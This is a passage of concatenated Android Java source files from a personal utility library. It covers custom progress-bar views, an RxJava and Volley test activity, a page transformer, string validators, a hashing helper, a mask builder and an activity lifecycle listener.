canvas.save();
canvas.translate(this.getPaddingLeft(), this.getHeight() / 2);
String text = getProgress() + "%";
float textWidth = mPaint.measureText(text);
float textHeight = mPaint.getFontMetrics().descent + mPaint.getFontMetrics().ascent;
float radio = this.getProgress() * 1.0f / this.getMax();
float progressPosX = (int) ((mRealWidth - textWidth - mTextOffset) * radio + 0.5);
// 进度临界值处理
if (progressPosX + textWidth > mRealWidth) {
progressPosX = mRealWidth - textWidth;
noNeedBg = true;
}
// 已完成进度
float endX = progressPosX - mTextOffset;
if (endX > 0) {
mPaint.setColor(mReachedBarColor);
mPaint.setStrokeWidth(mReachedProgressBarHeight);
canvas.drawLine(0, 0, endX, 0, mPaint);
}
// 百分比文本
if (mIfDrawText) {
mPaint.setColor(mTextColor);
canvas.drawText(text, progressPosX, Math.abs(textHeight / 2), mPaint);
}
// 未完成进度
if (!noNeedBg) {
float start = progressPosX + mTextOffset + textWidth;
mPaint.setColor(mUnReachedBarColor);
mPaint.setStrokeWidth(mUnReachedProgressBarHeight);
canvas.drawLine(start, 0, mRealWidth, 0, mPaint);
}
canvas.restore();
}
}
<file_sep>NestedScrollingChild -> NestedScrollingParent
void setNestedScrollingEnabled(boolean enabled)
boolean isNestedScrollingEnabled()
boolean hasNestedScrollingParent() int getNestedScrollAxes()
boolean startNestedScroll(int axes) boolean onStartNestedScroll(
View child,
View target,
int nestedScrollAxes)
void onNestedScrollAccepted(
View child,
View target,
int nestedScrollAxes)
void stopNestedScroll() void onStopNestedScroll(View target)
boolean dispatchNestedPreScroll( void onNestedPreScroll(
int dx, int dy, View target,
int[] consumed, int dx, int dy,
int[] offsetInWindow) int[] consumed)
boolean dispatchNestedScroll( void onNestedScroll(
int dxConsumed, int dyConsumed, View target,
int dxUnconsumed, int dyUnconsumed, int dxConsumed, int dyConsumed,
int[] offsetInWindow) int dxUnconsumed, int dyUnconsumed)
boolean dispatchNestedFling( boolean onNestedFling);
float velocityX, float velocityY, View target,
boolean consumed) float velocityX, float velocityY,
boolean consumed)
boolean dispatchNestedPreFling( boolean onNestedPreFling(
float velocityX, float velocityY); View target,
float velocityX, float velocityY)<file_sep>package com.icenler.lib.utils;
import com.icenler.lib.utils.helper.StringHelper;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
/**
* Created by iCenler - 2015/7/28:
* Description:常用数据加密形式
*/
public class EncryptUtil {
private EncryptUtil() {
throw new UnsupportedOperationException("cannot be instantiated");
}
private static final String TYPE_MD5 = "MD5";
private static final String TYPE_SHA1 = "SHA-1";
/**
* @param bytes
* @return SHA1 算法加密
*/
public static String makeSha1Sum(byte[] bytes) {
return makeEncrypt(TYPE_SHA1, bytes);
}
/**
* @param bytes
* @return MD5 算法加密
*/
public static String makeMd5Sum(byte[] bytes) {
return makeEncrypt(TYPE_MD5, bytes);
}
/**
* @param type
* @param bytes
* @return 根据机密类型加密
*/
private static String makeEncrypt(String type, byte[] bytes) {
String target = null;
MessageDigest digest = null;
if (bytes != null) {
try {
digest = MessageDigest.getInstance(type);
digest.update(bytes);
target = StringHelper.byte2Hex(digest.digest());
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
}
}
return target;
}
}
<file_sep>package com.icenler.lib.feature.activity;
import android.annotation.TargetApi;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.Canvas;
import android.graphics.Color;
import android.graphics.Paint;
import android.graphics.Path;
import android.graphics.RectF;
import android.graphics.drawable.AnimatedVectorDrawable;
import android.graphics.drawable.Drawable;
import android.os.Build;
import android.util.AttributeSet;
import android.view.View;
import android.view.animation.Animation;
import android.view.animation.AnimationUtils;
import android.view.animation.Interpolator;
import android.view.animation.LinearInterpolator;
import android.view.animation.Transformation;
import android.widget.ImageView;
import android.widget.TextView;
import com.android.volley.VolleyError;
import com.icenler.lib.R;
import com.icenler.lib.common.RequestCallback;
import com.icenler.lib.common.VolleyRequest;
import com.icenler.lib.feature.base.BaseActivity;
import com.icenler.lib.utils.LogUtil;
import com.icenler.lib.utils.ScreenUtil;
import com.icenler.lib.utils.manager.ToastManager;
import com.jakewharton.rxbinding.view.RxView;
import com.jakewharton.rxbinding.view.ViewClickEvent;
import java.io.File;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import rx.Observable;
import rx.Observer;
import rx.Subscriber;
import rx.android.schedulers.AndroidSchedulers;
import rx.functions.Action1;
import rx.functions.Func1;
import rx.schedulers.Schedulers;
public class TestActivity extends BaseActivity {
private ImageView iv;
private TextView text;
private AnimatedVectorDrawable searchToBar;
private AnimatedVectorDrawable barToSearch;
private float offset;
private Interpolator interp;
private int duration;
private boolean expanded = false;
@Override
protected int doGetLayoutResId() {
return R.layout.activity_test;
}
@Override
protected void doInit() {
iv = (ImageView) findViewById(R.id.search);
text = (TextView) findViewById(R.id.text);
searchToBar = (AnimatedVectorDrawable) getResources().getDrawable(R.drawable.svg_anim_search_to_bar);
barToSearch = (AnimatedVectorDrawable) getResources().getDrawable(R.drawable.svg_anim_bar_to_search);
interp = AnimationUtils.loadInterpolator(this, android.R.interpolator.linear_out_slow_in);
duration = 400;
// iv is sized to hold the search+bar so when only showing the search icon, translate the
// whole view left by half the difference to keep it centered
offset = -71f * (int) getResources().getDisplayMetrics().scaledDensity;
iv.setTranslationX(offset);
}
@TargetApi(Build.VERSION_CODES.LOLLIPOP)
public void animate(View view) {
if (!expanded) {
iv.setImageDrawable(searchToBar);
searchToBar.start();
iv.animate().translationX(0f).setDuration(duration).setInterpolator(interp);
text.animate().alpha(1f).setStartDelay(duration - 100).setDuration(100).setInterpolator(interp);
} else {
iv.setImageDrawable(barToSearch);
barToSearch.start();
iv.animate().translationX(offset).setDuration(duration).setInterpolator(interp);
text.setAlpha(0f);
}
expanded = !expanded;
}
private void init() {
// AndroidRx 再探
File[] folders = new File[5];
Observable.from(folders).flatMap(new Func1<File, Observable<File>>() {
@Override
public Observable<File> call(File file) {
return Observable.from(file.listFiles());
}
}).filter(new Func1<File, Boolean>() {
@Override
public Boolean call(File file) {
return file.getName().endsWith(".png");
}
}).map(new Func1<File, Bitmap>() {
@Override
public Bitmap call(File file) {
return getBitmapFromFile(file);
}
}).subscribeOn(Schedulers.io())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Action1<Bitmap>() {
@Override
public void call(Bitmap bitmap) {
// 主线程处理
}
});
Observer<String> observer = new Observer<String>() {
@Override
public void onCompleted() {
}
@Override
public void onError(Throwable e) {
}
@Override
public void onNext(String s) {
}
};
// Observer 扩展类 Subscriber
// 区别 onStart()
Subscriber<String> subscriber = new Subscriber<String>() {
@Override
public void onStart() {
super.onStart();
}
@Override
public void onCompleted() {
}
@Override
public void onError(Throwable e) {
}
@Override
public void onNext(String s) {
}
};
subscriber.isUnsubscribed();// 是否取消订阅
subscriber.unsubscribe();// 取消订阅
Observable<String> observable = Observable.create(new Observable.OnSubscribe<String>() {
@Override
public void call(Subscriber<? super String> subscriber) {
subscriber.onStart();
subscriber.onNext("Hello");
subscriber.onNext("Hi");
subscriber.onCompleted();
}
});
observable.subscribe(observer);// 订阅
observable.subscribe(subscriber);// 同上,类似监听点击事件
// 应用一:
Observable.just(0, 1, 2, 3)
.subscribeOn(Schedulers.io())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Action1<Integer>() {
@Override
public void call(Integer integer) {
LogUtil.d(String.valueOf(integer));
}
});
// 应用二:
Observable.just(0).map(new Func1<Integer, Drawable>() {
@TargetApi(Build.VERSION_CODES.LOLLIPOP)
@Override
public Drawable call(Integer integer) {
return getTheme().getDrawable(integer);
}
}).subscribeOn(Schedulers.io())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Observer<Drawable>() {
@Override
public void onCompleted() {
}
@Override
public void onError(Throwable e) {
ToastManager.show(getBaseContext(), e.getMessage());
}
@Override
public void onNext(Drawable drawable) {
// TODO 显示内容
}
});
RxView.clickEvents(null).throttleFirst(500, TimeUnit.MILLISECONDS)// 防抖动
.subscribe(new Action1<ViewClickEvent>() {
@Override
public void call(ViewClickEvent viewClickEvent) {
}
});
}
private Bitmap getBitmapFromFile(File file) {
return null;
}
private void volleyGet() {
String url = "www.baidu.com";
VolleyRequest.reqGet(url, "getTest", new RequestCallback(getBaseContext()) {
@Override
public void onSuccess(String result) {
}
@Override
public void onError(VolleyError error) {
}
});
}
private void volleyPost() {
String url = "www.baidu.com";
Map<String, String> params = null;
VolleyRequest.reqPost(url, "postTest", params, new RequestCallback(getBaseContext()) {
@Override
public void onSuccess(String result) {
}
@Override
public void onError(VolleyError error) {
}
});
}
@TargetApi(Build.VERSION_CODES.M)
private class LoadingView extends View {
private static final int DEF_DURATION = 1000;
//paint
private Paint mCirclePaint;
private Paint mAccBallPaint;
private RectF rectF;
private int mBigCircleColor = getResources().getColor(R.color.color_green_highlight);
private int mAccBallColor = getResources().getColor(R.color.color_orange_assist);
private int mBigCircleStroke = ScreenUtil.dp2px(1);
private int mDuration = DEF_DURATION;
private float mBitRadius = ScreenUtil.dp2px(50);
private float mSmallRadius = ScreenUtil.dp2px(10);
private float startAngle = 0.0f;
public LoadingView(Context context) {
this(context, null);
}
public LoadingView(Context context, AttributeSet attrs) {
this(context, attrs, 0);
}
public LoadingView(Context context, AttributeSet attrs, int defStyleAttr) {
super(context, attrs, defStyleAttr);
initView();
}
private void initView() {
// 圆环
mCirclePaint = new Paint();
mCirclePaint.setAntiAlias(true);
mCirclePaint.setColor(mBigCircleColor);
mCirclePaint.setStrokeWidth(mBigCircleStroke);
mCirclePaint.setStyle(Paint.Style.STROKE);
// 小球
mAccBallPaint = new Paint();
mAccBallPaint.setAntiAlias(true);
mAccBallPaint.setColor(mAccBallColor);
mAccBallPaint.setStyle(Paint.Style.FILL);
rectF = new RectF(0, 0, ScreenUtil.getDisplayWidth() >> 1, ScreenUtil.getDisplayWidth() >> 1);
startRotate(2000);
}
private void startRotate(long duration){
LinearAnimation animation = new LinearAnimation();
animation.setDuration(duration);
animation.setRepeatCount(Animation.INFINITE);
animation.setInterpolator(new LinearInterpolator());
animation.setLinearAnimationListener(new LinearAnimation.LinearAnimationListener() {
@Override
public void applyTans(float interpolatedTime) {
startAngle = 360 * interpolatedTime;
invalidate();
}
});
startAnimation(animation);
}
@Override
protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
super.onMeasure(widthMeasureSpec, heightMeasureSpec);
}
@Override
protected void onDraw(Canvas canvas) {
// drawSeekbar(canvas, 100);
drawSlowIndicator(startAngle, canvas);
}
private void drawSlowIndicator(float startAngle, Canvas canvas){
Paint circlePaint = new Paint();
circlePaint.setAntiAlias(true);
circlePaint.setColor(Color.parseColor("#A8D7A7"));
circlePaint.setStrokeWidth(7);
circlePaint.setStyle(Paint.Style.STROKE);
canvas.drawPath(getArcPath(), circlePaint);
int restoreCount = canvas.save();
canvas.translate(rectF.centerX(), rectF.centerY());
circlePaint.setStyle(Paint.Style.FILL);
canvas.drawPath(getBallPath(startAngle + 90), circlePaint);
canvas.drawPath(getBallPath(startAngle + 90 + 30 + 90), circlePaint);
canvas.drawPath(getBallPath(startAngle + 90 + 30 + 90 + 30 + 90), circlePaint);
canvas.restoreToCount(restoreCount);
}
private Path getArcPath() {
Path path = new Path();
path.addArc(rectF, startAngle, 90);
path.addArc(rectF, startAngle + 90 + 30, 90);
path.addArc(rectF, startAngle + 90 + 90 + 30 + 30, 90);
return path;
}
private void drawSeekbar(Canvas canvas, float startAngle) {
Paint circlePaint = new Paint();
circlePaint.setAntiAlias(true);
circlePaint.setColor(Color.parseColor("#FF4444"));
circlePaint.setStrokeWidth(7);
circlePaint.setStyle(Paint.Style.STROKE);
Path path = new Path();
path.addArc(rectF, 0, startAngle);
canvas.drawPath(path, circlePaint);
int restoreCount = canvas.save();
canvas.translate(rectF.centerX(), rectF.centerY());
circlePaint.setStyle(Paint.Style.FILL);
canvas.drawPath(getBallPath(startAngle), circlePaint);
canvas.restoreToCount(restoreCount);
}
private Path getBallPath(float startAngle) {
double sweepAngle = Math.PI / 180 * startAngle;
Path path = new Path();
float x = (float) Math.cos(sweepAngle) * (rectF.width() / 2);
float y = (float) Math.sin(sweepAngle) * (rectF.width() / 2);
path.moveTo(x, y);
path.addCircle(x, y, 10, Path.Direction.CCW);
return path;
}
}
private static class LinearAnimation extends Animation {
private LinearAnimationListener mListener = null;
interface LinearAnimationListener {
void applyTans(float interpolatedTime);
}
@Override
protected void applyTransformation(float interpolatedTime, Transformation t) {
super.applyTransformation(interpolatedTime, t);
if (mListener != null) {
mListener.applyTans(interpolatedTime);
}
}
public void setLinearAnimationListener(LinearAnimationListener listener){
mListener = listener;
}
}
}
/**
* >>> Shader 之图形渲染
* - BitmapShader: 图像渲染
* - LinearGradient: 线性渐变
* - RadialGradient: 环形渐变
* - SweepGradient: 扇形渐变
* - ComposeShader: 混合渲染,适用于组合操作
* 使用: mPaint.setShader(XXXShader)
*
* Example:配合 Matrix 实现扇形动态渐变
*
Paint paint = new Paint();
paint.setAntiAlias(true);
paint.setStrokeWidth(8);
paint.setStyle(Paint.Style.STROKE);
int[] f = {Color.parseColor("#00A8D7A7"), Color.parseColor("#ffA8D7A7")};
float[] p = {.0f, 1.0f};
SweepGradient sweepGradient = new SweepGradient(rectF.centerX(), rectF.centerX(), f, p);
Matrix matrix = new Matrix();
sweepGradient.getLocalMatrix(matrix);
matrix.postRotate(startAngle, rectF.centerX(), rectF.centerY());
sweepGradient.setLocalMatrix(matrix);
paint.setShader(sweepGradient);
canvas.drawArc(rectF,0, 360, true, paint);
* */
<file_sep>include ':app', ':androidmultichannelbuildtool-java-master'
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.content.res.TypedArray;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.RectF;
import android.util.AttributeSet;
import android.widget.ProgressBar;
import com.icenler.lib.R;
/**
* 自定义环形百分比进度条:基于ProgressBar
* 1、 属性详情参考:res/values/attr_progress_bar.xml - RoundProgressBarWidthNumber
* Created by Cenler on 2015/2/9.
*/
public class RoundProgressBarWidthNumber extends ProgressBar {
private static final int DEFAULT_TEXT_SIZE = 32;
private static final int DEFAULT_TEXT_COLOR = 0xFFFC00D1;
private static final int DEFAULT_REACHED_COLOR = 0xFFFC00D1;
private static final int DEFAULT_UNREACHED_COLOR = 0xFFD3D6DA;
private static final int DEFAULT_REACHED_PROGRESS_BAR_HEIGHT = 5;
private static final int DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT = 2;
private static final int DEFAULT_RADIUS = 50;
/**
* 全局绘图画笔
*/
protected Paint mPaint = new Paint();
/**
* 百分比进度颜色
*/
protected int mTextColor = DEFAULT_TEXT_COLOR;
/**
* 百分比进度字体大小:单位(sp)
*/
protected int mTextSize = sp2px(getContext(), DEFAULT_TEXT_SIZE);
/**
* 已完成进度条颜色
*/
protected int mReachedBarColor = DEFAULT_REACHED_COLOR;
/**
* 未完成进度条颜色
*/
protected int mUnReachedBarColor = DEFAULT_UNREACHED_COLOR;
/**
* 已完成进度条高度:单位(dp)
*/
protected int mReachedProgressBarHeight = dip2px(getContext(), DEFAULT_REACHED_PROGRESS_BAR_HEIGHT);
/**
* 未完成进度条高度:单位(dp)
*/
protected int mUnReachedProgressBarHeight = dip2px(getContext(), DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT);
/**
* 默认环形半径
*/
protected int mRadius = dip2px(getContext(), DEFAULT_RADIUS);
/**
* 进度比控制显示标志
*/
protected boolean mIfDrawText = true;
protected static final int VISIBLE = 0;
private int paintWidth;// 画笔粗细
public RoundProgressBarWidthNumber(Context context) { this(context, null); }
public RoundProgressBarWidthNumber(Context context, AttributeSet attrs) {
this(context, attrs, 0);
}
public RoundProgressBarWidthNumber(Context context, AttributeSet attrs, int defStyle) {
super(context, attrs, defStyle);
this.setHorizontalScrollBarEnabled(true);
getObtainStyleAttributes(attrs);
mPaint.setTextSize(mTextSize);
mPaint.setStrokeCap(Paint.Cap.ROUND);
mPaint.setAntiAlias(true);
mPaint.setDither(true);
/*
setAntiAlias: 设置画笔的锯齿效果
setDither: 设定是否使用图像抖动处理,会使绘制出来的图片颜色更加平滑和饱满,图像更加清晰
setStrokeCap: 当画笔样式为STROKE或FILL_OR_STROKE时,设置笔刷的图形样式,如圆形样式 Cap.ROUND 或方形样式 Cap.SQUARE
setColor: 设置画笔颜色
setARGB: 设置画笔的a,r,p,g值
setAlpha: 设置Alpha值
setTextSize: 设置字体尺寸
setStyle: 设置画笔风格,空心或者实心
setStrokeWidth: 设置空心的边框宽度
getColor: 得到画笔的颜色
getAlpha: 得到画笔的Alpha值
*/
}
/**
* 获取设置的属性值
* @param attrs
*/
private void getObtainStyleAttributes(AttributeSet attrs) {
TypedArray attributes = getContext().obtainStyledAttributes(attrs, R.styleable.RoundProgressBarWidthNumber);
mRadius = (int) attributes.getDimension(R.styleable.RoundProgressBarWidthNumber_progress_radius, mRadius);
mTextColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_text_color, mTextColor);
mTextSize = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_text_size, mTextSize);
mReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_reached_color, mReachedBarColor);
mUnReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_color, mUnReachedBarColor);
mReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_reached_bar_height, mReachedProgressBarHeight);
mUnReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_bar_height, mUnReachedProgressBarHeight);
int textVisible = attributes.getInt(R.styleable.HorizontalProgressBarWithNumber_progress_text_visibility, VISIBLE);
if (textVisible != VISIBLE) {
mIfDrawText = false;
}
/* Give back a previously retrieved StyledAttributes, for later re-use. */
attributes.recycle();
}
@Override
protected synchronized void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
int widthMode = MeasureSpec.getMode(widthMeasureSpec);
int heightMode = MeasureSpec.getMode(heightMeasureSpec);
// 画笔粗细
paintWidth = Math.max(mReachedProgressBarHeight, mUnReachedProgressBarHeight);
int diameter = (mRadius + paintWidth) * 2; // 直径
if (widthMode != MeasureSpec.EXACTLY) {
int exceptWidth = this.getPaddingLeft() + this.getPaddingRight() + diameter;
widthMeasureSpec = MeasureSpec.makeMeasureSpec(exceptWidth, MeasureSpec.EXACTLY);
}
if (heightMode != MeasureSpec.EXACTLY) {
int exceptHeight = this.getPaddingTop() + this.getPaddingBottom() + diameter;
heightMeasureSpec = MeasureSpec.makeMeasureSpec(exceptHeight, MeasureSpec.EXACTLY);
}
super.onMeasure(widthMeasureSpec, heightMeasureSpec);
}
@Override
protected synchronized void onDraw(Canvas canvas) {
canvas.save();
canvas.translate(getPaddingLeft(), getPaddingTop());
String text = getProgress() + "%";
float textWidth = mPaint.measureText(text);
float textHeight = mPaint.getFontMetrics().descent + mPaint.getFontMetrics().ascent;
// 未完成进度
mPaint.setStyle(Paint.Style.STROKE);
mPaint.setColor(mUnReachedBarColor);
mPaint.setStrokeWidth(mUnReachedProgressBarHeight);
canvas.drawCircle(mRadius + paintWidth, mRadius + paintWidth, mRadius, mPaint);
// 已完成进度
mPaint.setColor(mReachedBarColor);
mPaint.setStrokeWidth(mReachedProgressBarHeight);
float sweepAngle = this.getProgress() * 1.0f / this.getMax() * 360;
canvas.drawArc(new RectF(paintWidth, paintWidth, mRadius * 2 + paintWidth, mRadius * 2 + paintWidth), 0, sweepAngle, false, mPaint);
// 百分比
if (mIfDrawText) {
int textX = (int) (mRadius + paintWidth - textWidth / 2);
int textY = (int) (mRadius + paintWidth + Math.abs(textHeight / 2));
mPaint.setColor(mTextColor);
mPaint.setStyle(Paint.Style.FILL);
canvas.drawText(text, textX, textY, mPaint);
}
canvas.restore();
/* 绘制弧形 API 使用:
public void drawArc(RectF oval, float startAngle, float sweepAngle, boolean useCenter, Paint paint)
oval :指定圆弧的外轮廓矩形区域。
startAngle: 圆弧起始角度,单位为度。
sweepAngle: 圆弧扫过的角度,顺时针方向,单位为度。
useCenter: 如果为True时,在绘制圆弧时将圆心包括在内,通常用来绘制扇形。
paint: 绘制圆弧的画板属性,如颜色,是否填充等
*/
}
/**
* 根据手机的分辨率从 dp 的单位 转成为 px(像素)
*/
public int dip2px(Context context, float dpValue) {
final float scale = context.getResources().getDisplayMetrics().density;
return (int) (dpValue * scale + 0.5f);
}
/**
* 根据手机的分辨率从 ps 的单位 转成为 px(像素)
*/
public int sp2px(Context context, float spValue) {
final float fontScale = context.getResources().getDisplayMetrics().scaledDensity;
return (int) (spValue * fontScale + 0.5f);
}
}<file_sep>package com.icenler.lib.view.anima;
import android.support.v4.view.ViewPager;
import android.view.View;
import com.nineoldandroids.view.ViewHelper;
/**
* Created by iCenler - 2015/5/4:
* Description:魔方旋转动画
*/
public class CubePageTransformer implements ViewPager.PageTransformer {
private static float MIN_SCALE = 0.75f;
public void transformPage(View view, float position) {
int pageWidth = view.getWidth();
if (position < -1) { // [-Infinity,-1)
ViewHelper.setAlpha(view, 0);
} else if (position <= 0) { // [-1,0]
ViewHelper.setPivotX(view, view.getMeasuredWidth());
ViewHelper.setPivotY(view, view.getMeasuredHeight() * 0.5f);
ViewHelper.setRotationY(view, 90f * position);
} else if (position <= 1) { // (0,1]
ViewHelper.setPivotX(view, 0);
ViewHelper.setPivotY(view, view.getMeasuredHeight() * 0.5f);
ViewHelper.setRotationY(view, 90f * position);
} else { // (1,+Infinity]
ViewHelper.setAlpha(view, 0);
}
}
}
<file_sep>package com.icenler.lib.utils.helper;
import android.util.Patterns;
import com.icenler.lib.receiver.network.NetworkHelper;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
* Created by iCenler - 2015/7/17.
* Description:常用字符串工具类
* 1、 常用正则表达式判断
* 2、 ……
*/
public class StringHelper {
private StringHelper() {
throw new UnsupportedOperationException("cannot be instantiated");
}
/**
* 中文匹配
*/
public static boolean isChinese(String str) {
Pattern pattern = Pattern.compile("^[\\u0391-\\uffe5]*$");
Matcher matcher = pattern.matcher(str);
return matcher.matches();
}
/**
* 邮箱匹配
*/
public static boolean checkEmail(String str) {
Pattern pattern = Pattern.compile("^(\\w)+(\\.\\w+)*@(\\w)+((\\.\\w+)+)$");
Matcher matcher = pattern.matcher(str);
return matcher.matches();
}
/**
* 6-20位数字或字母账户匹配
*/
public static boolean checkAccount(String str) {
Pattern pattern = Pattern.compile("^[a-zA-Z0-9]{6,20}$");
Matcher matcher = pattern.matcher(str);
return matcher.matches();
}
/**
* 身份证验证
*/
public static boolean checkIDCard(String idCard) {
Pattern pattern = Pattern.compile("^(([0-9]{14}[x0-9]{1})|([0-9]{17}[x0-9]{1}))$");
Matcher matcher = pattern.matcher(idCard);
return matcher.matches();
}
/**
* 手机号断断
* 移动:134、135、136、137、138、139、150、151、157(TD)、158、159、187、188
* 联通:130、131、132、152、155、156、185、186
* 电信:133、153、180、189、(1349卫通)
*/
public static boolean isMobile(String mobiles) {
// ^((13[0-9])|(15[^4,\\D])|(18[0,5-9]))\\d{8}$" or
// ^[1]([3][0-9]{1}|58|59|88|89)[0-9]{8}$"
Pattern CMCC_REG_EX = Pattern.compile("^1(3[4-9]|5[01789]|8[78])[0-9]{8}$"); // 移动
Pattern CUCC_REG_EX = Pattern.compile("^1(3[0-2]|5[256]|8[56])[0-9]{8}$"); // 联通
Pattern CTCC_REG_EX = Pattern.compile("^1(33|53|8[09])[0-9]{8}$"); // 电信
Pattern pattern = Pattern.compile("^[1]([3][0-9]{1}|58|59|88|89)[0-9]{8}$");
Matcher matcher = pattern.matcher(mobiles);
if (matcher.matches()) {
if (CMCC_REG_EX.matcher(mobiles).matches())
NetworkHelper.MOBILES_TYPE = NetworkHelper.CMCC;
else if (CUCC_REG_EX.matcher(mobiles).matches())
NetworkHelper.MOBILES_TYPE = NetworkHelper.CUCC;
else if (CTCC_REG_EX.matcher(mobiles).matches())
NetworkHelper.MOBILES_TYPE = NetworkHelper.CTCC;
return true;
} else {
return false;
}
}
/**
* 不支持含小数点的数字
*/
public static boolean isPureNumber(String str) {
Pattern p = Pattern.compile("^[0-9]*$");
Matcher m = p.matcher(str);
return m.matches();
}
/**
* 检查是否是数字,支持含小数点的数字
*/
public static boolean isValidNumber(String str) {
Pattern p = Pattern.compile("^\\d+\\.{0,1}\\d*$");
Matcher m = p.matcher(str);
return m.matches();
}
/**
* 判断输入是否是6-20位数字和字母组合
*/
public static boolean isNumAndLetter(String str) {
Pattern p = Pattern.compile("(?!^[0-9]+$)(?!^[a-zA-Z]+$)[0-9a-zA-Z]{6,20}");
Matcher m = p.matcher(str);
return m.matches();
}
/**
* Url 连接匹配 Patterns 参见文档
*/
public static boolean isWebUrl(String url) {
return Patterns.WEB_URL.matcher(url).matches();
}
/**
* @param bytes
* @return 返回字节码的十六进制表示形式
*/
public static String byte2Hex(byte[] bytes) {
final String HEX = "0123456789ABCDEF";
StringBuffer sb = new StringBuffer();
for (byte b : bytes) {
sb.append(HEX.charAt((b >> 4) & 0x0F));
sb.append(HEX.charAt(b & 0x0F));
}
return sb.toString();
}
}
<file_sep>package com.icenler.lib.view.guideview;
import android.graphics.Rect;
import android.support.annotation.ColorInt;
import android.view.View;
public class Mask {
public enum Shape {
CIRCLE, RECTANGLE
}
Rect targetRect;
Shape shapeStyle;
int radiusSize;
int cornerSize;
int borderSize;
int borderColor;
int paddingLeft;
int paddingRight;
int paddingTop;
int paddingBottom;
int maskId;
int offsetX;
int offsetY;
public static Mask.Builder builder() {
return new Mask.Builder();
}
private Mask(Mask.Builder builder) {
this.targetRect = builder.rect;
this.shapeStyle = builder.shape;
this.radiusSize = builder.radius;
this.cornerSize = builder.corner;
this.borderSize = builder.border;
this.borderColor = builder.borderColor;
this.paddingLeft = builder.left;
this.paddingRight = builder.right;
this.paddingTop = builder.top;
this.paddingBottom = builder.bottom;
this.maskId = builder.maskId;
this.offsetX = builder.offsetX;
this.offsetY = builder.offsetY;
}
public static final class Builder {
private Rect rect;
private Shape shape;
private int radius;
private int corner;
private int border;
private int borderColor;
private int left;
private int right;
private int top;
private int bottom;
private int maskId = View.NO_ID;
private int offsetX;
private int offsetY;
private Builder() {
}
public Mask.Builder setMaskRect(Rect targetRect) {
this.rect = targetRect;
return this;
}
public Mask.Builder setShapeStyle(Shape shapeStyle) {
this.shape = shapeStyle;
return this;
}
public Mask.Builder setRadius(int radius) {
this.radius = radius;
return this;
}
public Mask.Builder setCorner(int corner) {
this.corner = corner;
return this;
}
public Mask.Builder setBorder(int border) {
this.border = border;
return this;
}
public Mask.Builder setBorder(int border, @ColorInt int color) {
this.border = border;
this.borderColor = color;
return this;
}
public Mask.Builder setBorderColor(@ColorInt int color) {
this.borderColor = color;
return this;
}
public Mask.Builder setPaddingLeft(int left) {
this.left = left;
return this;
}
public Mask.Builder setPaddingTop(int top) {
this.top = top;
return this;
}
public Mask.Builder setPaddingRight(int right) {
this.right = right;
return this;
}
public Mask.Builder setPaddingBottom(int bottom) {
this.bottom = bottom;
return this;
}
public Mask.Builder setPadding(int left, int top, int right, int bottom) {
this.left = left;
this.top = top;
this.right = right;
this.bottom = bottom;
return this;
}
public Mask.Builder setMaskId(int maskId) {
this.maskId = maskId;
return this;
}
public Mask.Builder setOffsetX(int offsetX) {
this.offsetX = offsetX;
return this;
}
public Mask.Builder setOffsetY(int offsetY) {
this.offsetY = offsetY;
return this;
}
public Mask build() {
return new Mask(this);
}
}
}<file_sep>package com.icenler.lib.receiver.lifecycle;
import android.app.Activity;
import android.app.Application;
import android.content.Intent;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v4.content.LocalBroadcastManager;
import com.icenler.lib.utils.LogUtil;
import java.util.LinkedList;
/**
* Created by iCenler on 2016/1/28.
* Description: 全局生命周期监听
*/
public class ApplicationLifecycleListener implements Application.ActivityLifecycleCallbacks {
/**
* 后台切换广播
*/
public static final String ACTION_BACKGROUND_CHANGED = "app.intent.action.BACKGROUND_CHANGED";
/**
* 前台切换广播
*/
public static final String ACTION_FOREGROUND_CHANGED = "app.intent.action.FOREGROUND_CHANGED";
/**
* 可见 Activity 数量,用于识别前后台切换
*/
private int activeCount = 0;
/**
* 应用是否处于后台
*/
private boolean isBackground = true;
private Activity preActivity;
private Activity currActivity;
private LinkedList<Activity> activityStack = new LinkedList<>();
/**
* @return 应用前后台状态
*/
public boolean isBackground() {
return isBackground;
}
/**
* @return 当前任务栈栈顶下的 Activity 索引
*/
@Nullable
public Activity getPreActivity() {
return preActivity;
}
/**
* @return 当前任务栈栈顶 Activity 索引
*/
@Nullable
public Activity getTopActivity() {
return currActivity;
}
/**
* @return 获取 Activity 任务栈
*/
public LinkedList<Activity> getActivityStack() {
return new LinkedList<>(activityStack);
}
@Override
public void onActivityCreated(Activity activity, Bundle savedInstanceState) {
LogUtil.i(activity.getClass().getSimpleName());
activityStack.add(activity);
}
@Override
public void onActivityStarted(Activity activity) {
LogUtil.i(activity.getClass().getSimpleName());
activeCount++;
}
@Override
public void onActivityResumed(Activity activity) {
LogUtil.i(activity.getClass().getSimpleName());
if (isBackground) {
isBackground = false;
foreground(activity);
}
currActivity = activityStack.peekLast();
LogUtil.d("PreActivity:" + String.valueOf(preActivity));
LogUtil.d("CurrActivity:" + String.valueOf(currActivity));
}
@Override
public void onActivityPaused(Activity activity) {
LogUtil.i(activity.getClass().getSimpleName());
preActivity = activity;
if (activity.isFinishing()) {// 移除正在关闭 Activity, 处理延迟销毁问题
activityStack.pollLast();
if (activityStack.size() > 1) {
preActivity = activityStack.get(activityStack.size() - 2);
} else {
preActivity = null;
}
}
}
@Override
public void onActivityStopped(Activity activity) {
